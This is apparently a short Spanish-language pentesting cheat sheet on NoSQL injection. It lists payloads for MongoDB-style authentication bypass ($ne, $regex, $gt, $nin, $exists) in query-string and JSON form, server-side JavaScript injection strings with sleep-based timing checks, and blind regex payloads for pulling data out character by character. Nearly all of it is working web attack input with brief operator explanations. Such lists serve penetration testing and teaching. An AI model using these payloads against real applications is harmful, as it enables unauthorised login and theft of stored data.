NoSQL injection (NoSQLi)
Authentication bypass
Query string
username[$ne]=noexiste&password[$ne]=noexiste
username[$regex]=.*&password[$regex]=.*
username[$gt]=&password[$gt]=
username[$gte]=&password[$gte]=
username[$nin][]=noexiste&password[$nin][]=noexiste
username[$exists]=true&password[$exists]=true
$ne = not equals.
$regex = match a specified RegEx.
$gt = greater than.
$gte = greater than or equal to.
$nin = not in the specified array.
JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "noexiste"}, "password": {"$ne": "noexiste"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
$ne = not equals.
$gt = greater than.
Server-Side JavaScript Injection (SSJI)
" || true || ""=="
' || true || ''=='
" && (sleep(5000)) || ""=="
' && (sleep(5000)) || ''=='
Data exfiltration
param[$ne]=noexiste
param[$regex]=.*
param[$gt]=''
param[$gte]=''
param[$lt]='~'
param[$lte]='~'
Blind
# query string
param[$regex]=^XYZ.*$
# JSON
{"param":{"$regex":"^XYZ.*$"}}
Server-Side JavaScript Injection (SSJI)
" || (this.param.match('^XYZ.*')) || ""=="
" || (this.param.match('^XYZ.*')) && (sleep(5000)) || ""=="
Wordlists
Última actualización
¿Te fue útil?